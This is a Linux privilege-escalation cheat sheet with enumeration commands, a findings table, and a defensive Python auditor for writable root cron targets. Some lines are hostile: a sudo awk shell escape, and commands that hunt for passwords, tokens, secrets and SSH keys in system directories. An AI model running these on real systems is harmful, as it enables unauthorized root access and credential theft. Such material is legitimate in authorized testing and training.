```bash
id
uname -a
cat /etc/os-release
sudo -l
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
ss -lntup
ps auxf
crontab -l
ls -al /etc/cron*
```
| Finding | Why it matters |
|---|---|
| sudo rule | NOPASSWD or writable script target |
| SUID binary | GTFOBins or custom vuln |
| capabilities | cap_setuid, cap_sys_admin, cap_dac_override |
| cron / timer | writable script or writable PATH element |
| service creds | env vars, config files, backups |
```bash
# sudo
sudo -l
sudo awk 'BEGIN {system("/bin/sh")}'
# SUID
find / -perm -4000 -type f 2>/dev/null
# check GTFOBins for exact primitive
# capabilities
getcap -r / 2>/dev/null
```
```bash
echo $PATH
find / -writable -type d 2>/dev/null
ls -al /etc/cron*
systemctl list-timers --all
# writable script executed by root?
grep -R '/tmp\|/dev/shm\|home' /etc/systemd /etc/cron* 2>/dev/null
```
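Added audit example, not part of the original cheat sheet: it parses system-crontab lines and flags root jobs whose script, its parent directory, or a PATH element searched before the real binary is writable by a non-root user, which is the "cron / timer" finding above. The crontab text and the permission model are constructed samples standing in for `/etc/crontab` and `os.stat`.

```python
import stat
# Constructed /etc/crontab-style sample (system format: schedule, user, command).
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * root /opt/backup/run.sh
0 3 * * * root backup-rotate --quiet
@reboot root /usr/local/bin/start-agent
"""
# Constructed permission model standing in for os.stat: path -> (mode, uid, gid).
SAMPLE_FS = {
    "/opt/backup": (0o755, 0, 0), "/opt/backup/run.sh": (0o777, 0, 0),  # world-writable script
    "/usr/local/sbin": (0o775, 0, 1001),  # group-writable PATH element, non-root group
    "/usr/local/bin": (0o755, 0, 0), "/usr/local/bin/start-agent": (0o755, 0, 0),
    "/sbin": (0o755, 0, 0), "/bin": (0o755, 0, 0), "/usr/sbin": (0o755, 0, 0), "/usr/bin": (0o755, 0, 0),
}

def writable_by_unprivileged(path, fs):
    # World-writable, owned by non-root, or group-writable by a non-root group.
    # Paths missing from the model default to a safe root-owned 0755 entry.
    mode, uid, gid = fs.get(path, (0o755, 0, 0))
    return bool(mode & stat.S_IWOTH) or uid != 0 or (bool(mode & stat.S_IWGRP) and gid != 0)

def audit_crontab(text, fs):
    # Findings: (line_no, kind, path) for root jobs whose script, its directory,
    # or a PATH element searched before the real binary is writable by non-root.
    findings, path_dirs = [], []
    for no, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if "=" in fields[0]:                       # environment line, e.g. PATH=...
            key, _, value = line.partition("=")
            if key.strip() == "PATH":
                path_dirs = value.strip().split(":")
            continue
        n_sched = 1 if fields[0].startswith("@") else 5   # @reboot etc. vs 5-field schedule
        user, cmd = fields[n_sched], fields[n_sched + 1]
        if user != "root":
            continue
        if "/" in cmd:                             # explicit path: check file and parent dir
            for p in (cmd, cmd.rsplit("/", 1)[0] or "/"):
                if writable_by_unprivileged(p, fs):
                    findings.append((no, "writable-target", p))
        else:                                      # bare name: resolved through PATH in order
            for d in path_dirs:
                if writable_by_unprivileged(d, fs):
                    findings.append((no, "writable-path-element", d))
                if f"{d}/{cmd}" in fs:             # real binary found; later dirs are harmless
                    break
    return findings
```

Replace `SAMPLE_FS` lookups with `os.stat` to run it against a live host; the same logic applies to `/etc/cron.d/*` entries, which use the same user-field format.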
```bash
grep -Rni 'pass\|token\|secret\|key' /etc /opt /var/www 2>/dev/null | head
find / -name '*.bak' -o -name '*.old' -o -name '*.swp' 2>/dev/null
ls -al ~/.ssh /root/.ssh 2>/dev/null
env
```
```bash
cat /proc/1/cgroup
mount
ip a
docker ps 2>/dev/null
# if inside container, check mounted docker socket / host fs
```
```bash
linpeas.sh
lse.sh
pspy64
# still verify manually before exploiting
```
| Mistake | Note |
|---|---|
| kernel exploit first | often unnecessary and noisy |
| copying GTFOBins blindly | version / shell path may differ |
| ignoring timers | systemd timers replace cron a lot |
| not checking group memberships | docker, lxd, adm can be enough |
| forgetting capabilities | less obvious than SUID |